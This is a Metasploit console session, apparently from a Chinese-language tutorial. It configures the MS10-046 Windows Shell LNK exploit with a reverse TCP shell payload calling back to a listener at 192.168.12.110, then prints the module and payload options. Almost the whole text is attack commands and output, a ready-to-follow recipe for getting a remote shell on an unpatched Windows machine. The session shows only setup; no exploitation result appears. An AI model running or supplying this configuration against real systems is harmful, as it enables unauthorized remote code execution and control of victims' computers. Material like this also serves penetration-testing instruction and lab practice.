Exploits
========
Name Rank Description
---- ---- -----------
windows/browser/ms10_046_shortcut_icon_dllloader excellent Microsoft Windows Shell LNK Code Execution
msf > use windows/browser/ms10_046_shortcut_icon_dllloader #选择漏洞利用文件
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/shell/reverse_tcp #为漏洞加入ShellCode
payload => windows/shell/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost 192.168.12.110
lhost => 192.168.12.110
msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost 192.168.12.110
srvhost => 192.168.12.110
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.12.110 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.12.110 yes The listen address
LPORT 4444 yes The listen port